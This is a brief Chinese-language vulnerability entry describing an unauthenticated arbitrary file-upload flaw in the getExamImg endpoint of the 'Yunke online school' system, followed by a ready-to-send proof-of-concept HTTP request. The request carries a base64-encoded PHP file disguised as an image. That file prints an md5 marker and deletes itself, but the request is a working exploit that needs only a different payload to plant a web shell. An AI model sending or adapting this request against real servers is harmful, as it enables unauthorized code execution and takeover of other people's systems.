漏洞描述
云课网校系统在 /index/Exam/getExamImg 接口中存在任意文件上传漏洞,未经身份验证的攻击者可以通过该漏洞上传恶意脚本文件,从而控制整个服务器。
云课网校系统 /index/Exam/getExamImg 文件上传漏洞
PoC代码
POST /index/Exam/getExamImg HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 95
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
src_data=data:image/php;base64,PD9waHAgZWNobyBtZDUoIkRWVUNlTVpHIik7dW5saW5rKF9fRklMRV9fKTs/Pg==